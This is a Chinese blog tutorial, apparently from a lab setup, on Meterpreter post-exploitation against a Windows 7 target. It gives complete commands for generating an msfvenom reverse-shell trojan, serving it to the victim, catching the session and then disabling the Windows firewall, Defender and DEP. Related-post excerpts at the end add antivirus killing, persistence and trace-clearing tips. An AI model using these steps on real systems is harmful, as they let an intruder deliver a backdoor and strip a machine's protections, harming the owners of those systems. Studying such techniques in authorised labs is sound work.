权限维持——Meterpreter后渗透阶段之关闭防火墙与杀毒软件

已于 2023-11-25 08:18:06 修改
阅读量903 收藏 13
点赞数 10
分类专栏: 网络渗透测试技术 文章标签: metersphere
于 2023-11-25 00:25:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70210435/article/details/134548132
版权

学习目标

利用Meterpreter的shell操作windows命令执行关闭防火墙与杀毒软件

实验环境

攻击机:kali
靶机:windows7

实验内容

步骤一:建立session

1.打开一个终端,输入以下命令生成一个windos系统的木马

命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali的IP lport=1234 -f exe > msf.exe

在这里插入图片描述

2.利用python在当前目录开启一个http服务,使靶机通过http服务将上述生成的木马进行下载。

命令:python -m http.server

在这里插入图片描述

3.进入到靶机中,使用浏览器对攻击机的ip:8000端口进行访问,并对刚生成的msf.exe文件点击进行下载
在这里插入图片描述

4.回到攻击机中,启动msfconsole

命令:msfconsole

在这里插入图片描述

5.设置我们需要使用到的监听模块 exploit/multi/handler

命令:use exploit/multi/handler

在这里插入图片描述

6.首先设置payload,需要和我们生成的木马文件的payload一致,接着设置LHOST和LPOR参数,同步生成的木马中设置的参数,并查看是否设置成功,依次执行以下命令

命令 set payload windows/x64/meterpreter/reverse_tcp
     set lhost kali的IP
​     set lport 1234

在这里插入图片描述

7.参数设置好后开始执行监听

命令:exploit

在这里插入图片描述

8.进入到靶机中,对木马程序msf.exe进行双击运行。此时攻击机的metasploit会显示由新的session生成,即表示已经获取到了靶机的meterpreter shell
在这里插入图片描述

9.在当前的Meterpreter界面上输入? 即可查看帮助命令
在这里插入图片描述

10.输入命令background即可将当前的Meterpreter Shell放到后台
11.输入sessions可查看当前所有的session会话
12.输入session -i SesssionID即可进入指定的Meterpreter Shell界面
在这里插入图片描述

步骤二:后渗透之关闭防火墙

1.进入windows shell终端

命令:shell

在这里插入图片描述

2.解决显示乱码

命令:chcp 65001

在这里插入图片描述

3.尝试关闭/打开windows防火墙(需管理员及以上权限)

开启命令:netsh advfirewall set allprofiles state on
关闭命令:netsh advfirewall set allprofiles state off

在这里插入图片描述

4.关闭Denfender

命令:net stop windefend

在这里插入图片描述

5.关闭DEP

命令:Bcdedit.exe /set {current} nx AlwaysOff

在这里插入图片描述

总结

  meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息
  另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。
  最后,meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。

尝试学RE中
关注
  • 10
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于metasploit的木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2259
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
渗透关闭防火墙杀毒软件并开启远程桌面
good good study
04-13 8090
目录 一. 关闭防火墙 二.关闭windows Defender和DEP数据执行保护 三. 关闭杀毒软件 四. 开启远程桌面 当我们拿下一台主机后,想在主机上留后门,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的后门程序进行拦截。我们用msf获取到了权限 一. 关闭防火墙 以下是在win7和win2008r2的机器上实验的,在administrator和system的权限下都能成功将防火墙关闭和开启。普通用户不行 1. 在system权限下执行 此时防火墙的状态是开启的.
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
最新发布
2401_84264692的博客
05-06 837
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
Metasploit--后渗透--关闭杀毒软件
千寻的博客
02-18 1522
关闭杀毒软件 拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件,通过命令 run killav
metasploit关闭杀毒软件
天元喜羊羊的博客
04-27 3807
meterpreter > run killav [*] Killing Antivirus services on the target... meterpreter > 特意在XP上装了360,但是没有成功关闭杀毒软件。不知道为什么。
test信息收集5(关闭firewall和杀软)
qq_45300786的博客
12-27 158
window下饿netsh 设置监听 设置payload 执行监听 靶机执行文件,反弹shell 。。。 一些步骤我就不做了,前面我写的文章都有 关闭防火墙1 我们可以看到靶机是防火墙打开的,接下来我们就要把它远程关闭。 之前我们说了,可以利用netsh命令来关闭防火墙,但是要shell模式才能用netsh命令, 看到乱码了用下chcp 65001,改下格式 netsh advfirewall set allprofiles state off 可以看到靶机防火墙已将远程关闭了 关.
MeterSphere接口请求及响应内容中的脚本处理
qq_33417373的博客
06-19 1456
BeanShell进行参数处理
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
防火墙设置软件。需要管理员权限,一键开启关闭和查看
06-10
防火墙设置软件。包含打开设置和查看功能,,个人使用的个人制作版本,一键打开和关闭防火墙。需要管理员权限
NetDLLSpy:.NET后渗透下的权限维持,附下载DLL
04-27
再配合强大的csc和js编译器就可以完美的生成DLL并且作为WebShell后门程序,这就给攻击者在后渗透阶段权限维持提供了极大的便利,此后门可以实现任意后缀名访问,可以绕过一些IDS等防御产品,笔者从攻防的视角总结出...
WEB渗透——新手入门之初级工具利用
01-16
【标题】:“WEB渗透——新手入门之初级工具利用” 【描述】:“WEB渗透—优惠券https://www.panpansq.com—新手入门之初级工具利用”这个描述提到了一个在线资源,可能是提供有关WEB渗透教程的网站,它可能提供了...
Metasploit
辉小鱼的博客
11-03 477
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Apache JMeter应用中对于中文乱码的主要解决方法
一个测试工程师的代码世界
10-16 7994
SapmleResult中的中文乱码解决方法 Sampler中文乱码解决方法 HTTP协议录制中文问题
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 4700
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
Kali环境meterpreter 使用 shell乱码问题解决方法
旺仔Sec&blog
05-07 692
注:Chcp 65001的意思是改变当前活动代码页为UTF-8,让当前的批处理窗口支持UTF-8格式的文件。在shell终端中输入chcp 65001。
应急响应实战笔记——权限维持篇:⑥ 三大渗透测试框架权限维持技术
君逍遥o
04-07 622
渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
关闭windows自带杀毒软件Windows defender命令,命令行关闭windows服务
墨痕诉清风的博客
03-26 6638
net stop windefend
MSF之meterpreter权限维持
梦想专栏
07-30 2058
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
meterpreter渗透
04-07
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取系统信息:使用sysinfo命令可以获取目标系统的详细信息,包括操作系统版本、硬件配置、用户信息等等,这些信息有助于后续的攻击操作。 2. 收集凭证信息:使用hashdump命令可以获取目标系统上保存的用户密码哈希值,然后可以使用破解工具进行破解,从而获取有效的登录凭证。 3. 扫描网络和主机:使用portscan和subnet命令可以对目标网络进行扫描,发现开放的服务和漏洞,然后可以使用exploit模块进行攻击。 4. 接管会话和持久化:使用migrate命令可以将Meterpreter会话转移到目标系统中的其他进程中,从而提高攻击的稳定性和隐蔽性。同时,还可以使用persist命令将Meterpreter程序持久化到目标系统中,以便于下次连接。 5. 进行攻击操作:利用Meterpreter的各种模块和命令,可以进行各种攻击操作,包括远程执行命令、上传下载文件、横向移动、权限提升、漏洞利用等等。 6. 残留清理:完成攻击后,应该进行残留的清理工作,包括删除日志文件、清除历史记录、删除痕迹等等,以避免被发现和追踪。 总之,Meterpreter是一款非常强大的后渗透工具,可以帮助渗透测试人员和黑客更好地进行攻击和渗透测试工作。但是,在使用Meterpreter进行攻击时,应该遵循道德和法律的原则,避免对他人造成不必要的损害和危害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值